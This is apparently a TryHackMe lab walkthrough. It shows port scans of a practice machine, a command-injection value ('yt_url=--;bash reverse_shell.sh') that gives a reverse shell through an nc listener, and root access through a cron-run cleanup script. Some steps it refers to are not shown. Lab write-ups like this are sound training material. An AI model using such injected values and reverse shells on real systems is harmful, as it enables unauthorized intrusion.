Let's perform a simple nmap scan against the target.
$ nmap -p- 10.10.162.57 -T5
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-08 12:08 IST
Warning: 10.10.162.57 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.162.57
Host is up (0.13s latency).
Not shown: 64219 closed tcp ports (conn-refused), 1314 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 657.11 seconds
We can now run an advanced scan against the open ports.
┌──(kunal㉿kali)-[~/tryhackme]
└─$ nmap -A -p 22,80 10.10.162.57
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-08 12:22 IST
Nmap scan report for 10.10.162.57
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
| 256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_ 256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds
There are two open ports with the following services:
Port
Service
22
ssh
80
http
Now, we can use gobuster to perform directory brute forcing.
Note that in order for this command to work, there needs to be a TAB between wget and http instead of a SPACE.
Now, let's set up a nc listener.
$ nc -nlvp 9999
listening on [any] 9999 ...
Next, we have to execute the reverse_shell.sh file on the server using the following:
yt_url=--;bash reverse_shell.sh
Let's check back on our nc listener.
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.162.57] 55344
bash: cannot set terminal process group (884): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dmv:/var/www/html$
Let's list out the files in the current directory.
After around a minute, when the system next executes the /var/www/html/tmp/clean.sh file, we will get our reverse shell with root privilege.
$ nc -nlvp 9998
listening on [any] 9998 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.162.57] 38570
bash: cannot set terminal process group (2098): Inappropriate ioctl for device
bash: no job control in this shell
root@dmv:/var/www/html/tmp#